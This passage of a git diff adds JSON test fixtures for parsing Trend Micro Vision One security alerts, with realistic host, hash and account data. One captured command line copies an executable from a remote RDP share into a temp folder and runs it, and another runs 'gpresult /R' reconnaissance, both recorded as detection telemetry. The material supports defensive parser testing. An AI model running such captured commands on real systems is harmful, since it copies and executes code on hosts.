\"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Potential Information Gathering", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:48:06Z", + "host": { + "id": "7b00c266-f17f-439f-bb94-3945d463a78b", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753" + }, + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + ], + "ip": [ + "10.0.0.6" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Potential Information Gathering" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index b31951fe2..5b8dbfc95 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -24,6 +24,7 @@ "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" }, "host": { + "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", "ip": [ "1.2.3.4" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 9c013b1c0..9a41ea92c 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -24,6 +24,7 @@ "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" }, "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", "ip": [ "10.10.58.51" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json new file mode 100644 index 000000000..dbeed8e8e --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, 